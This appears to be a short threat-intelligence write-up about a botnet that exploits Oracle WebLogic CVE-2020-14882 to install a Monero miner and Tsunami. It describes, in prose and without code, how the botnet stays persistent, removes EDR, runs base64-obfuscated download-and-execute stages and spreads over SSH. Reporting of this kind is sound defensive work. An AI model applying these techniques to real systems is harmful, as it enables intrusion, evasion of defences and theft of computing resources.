A botnet is detected that propagates using weblogic exploit. The botnet carries two payloads: 1) a Monero XMR Miner binaries; and 2) Tsunami binaries. This botnet is primarily targeting cloud servers. In September, an earlier version of the botnet was exploiting misconfigured docker API. Interestingly, the current botnet version contains unused code for exploiting Redis and for bruteforcing SSH. The botnet achieves persistence in multiple ways; kills running processes, potentially competing mining tools and eliminates EDR. It uses base64 encoded intermediate stage shell-scripts and base64 encoded commands to download and execute python scripts. Tsunami is added as a second payload, in addition to Monero XMR miner.
It makes use of the Oracle WebLogic RCE exploit CVE-2020-14882. The campaign uses multiple shell-scripts and python-scripts with different dropping locations and connects to binary hosting webservers using hardcoded IP addresses and domains.
The stage 1 executes two payloads, a shell script, xms, and a python script. The shellscript xms is piped to bash from curl, in case that fails, it is fetched with wget, executed and removed, to prevent analysis. The python script is fetched and executed using base64 encoded commands to avoid detection and analysis. The xms shell script attempts to infect hosts that the server has been previously connected to. It also lists running processes to grab information about active SSH connections. The XMR Miner is also targeting Windows servers which is evident by the presence of .exe binaries in the same ftp server.